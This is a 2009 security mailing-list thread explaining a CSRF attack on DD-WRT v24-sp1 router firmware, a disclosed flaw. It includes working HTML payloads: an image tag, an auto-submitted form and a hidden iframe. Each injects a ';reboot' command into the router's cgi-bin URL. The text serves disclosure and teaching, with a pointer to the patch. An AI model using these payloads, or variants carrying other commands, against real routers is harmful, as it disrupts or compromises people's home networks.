PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 )

From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sat, 25 Jul 2009 21:51:03 -0400
I'm glad you approve, and thanks for letting us know about the exploit via
the recent podcast. I don't follow the latest vulnerability as well as I
should.

Adrian

On Sat, Jul 25, 2009 at 8:59 PM, Carlos Perez <carlos_perez at darkoperator.com

wrote:



Only thing I can say You ROCK!!!!!' dude

Sent from my iPhone

On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <irongeek at irongeek.com>
wrote:

I heard Carlos talk about it, so I started to work on a writeup, which I'll
post to my site shortly.* Carlos, thanks for the idea.
*

        I was interested in giving a reall world example of a CSRF attack,
similar to the ones I mentioned in my OWASP Top 5 
video<http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville>,
and maybe use it against a piece of internal equipment that is behind a NAT
box. Then I heard about Carlos Perez 
write-up<http://www.darkoperator.com/blog/2009/7/21/using-metasploit-dd-wrt-exploit-module-thru-pivot.html>on using 
Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware.
I thought this would be a great way to demo the concept of using CSRF/XSS
against hardware behind a NAT, especially since I've done a video on
installing DD-WRT 
before<http://www.irongeek.com/i.php?page=videos/intro-to-dd-wrt-mod-your-wireless-router-to-do-more>.
Some people thing it's not a big deal since the attack request has to come
from an internal source, but they don't think about the fact that CSRF can
make the attack come from an internal source. Granted, this may not be
considered a true CSRF from the stand point that you don't have to have
authenticated against your DD-WRT v24-sp1 router, but it works much the same
way. Carlos' demo shows using Metasplot to open a shell on the router, then
do some other messing around, I'll just show how this vulnerability could be
used to reboot the router just using html (there are far more deviant things
you could do). For the most part this attack essentially amounts to pointing
the browser at <http://ip-of-router/cgi-bin/>http://ip-of-router/cgi-bin/*
;*some-command . Since the default IP for most home NAT routers is
192.168.1.1, this is a pretty easy attack that could be pulled off against
people who browse a page that the attacker controls.  The attacker would not
have to explicitly have the victim go to <http://ip-of-router/cgi-bin/>
http://ip-of-router/cgi-bin/*;*some-command to pull off the attack, there
are plenty of ways to make a browser automatically make the reques, for
example:
* *

*IMG get:*
<img src=*" <http://192.168.1.1/cgi-bin/;reboot>
http://192.168.1.1/cgi-bin/;reboot"*>
* *

*Post method:*
<form name=*"csrfform"* method=*"post"* action=*"<http://192.168.1.1/cgi-bin/;reboot>
http://192.168.1.1/cgi-bin/;reboot"*>* *<input type=*'hidden'* name=*
'input_from_form'* value=*"Test of of auto submitted form."*>* *</form>* *
<script> document.csrfform.submit*()* </script>* *

*IFRAME Get:*
<iframe src=*" <http://192.168.1.1/cgi-bin/;reboot>
http://192.168.1.1/cgi-bin/;reboot"* style=*"width:0px; height:0px;
border: 0px"*></iframe>

If you would like to test this code against your DD-WRT v24-sp1 click the
link below:
        DD-WRT test page, only click if you want your router to 
reboot<http://www.irongeek.com/security/ddwrttest-only-click-if-you-want-your-router-to-reboot.htm>

For information on the fix:
         <http://www.dd-wrt.com/>http://www.dd-wrt.com

Guess its time to patch.

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: <http://pauldotcom.com>http://pauldotcom.com


_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com


-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090725/e4bb2dc7/attachment.htm
Previous By Date Next
Previous By Thread Next

Current thread: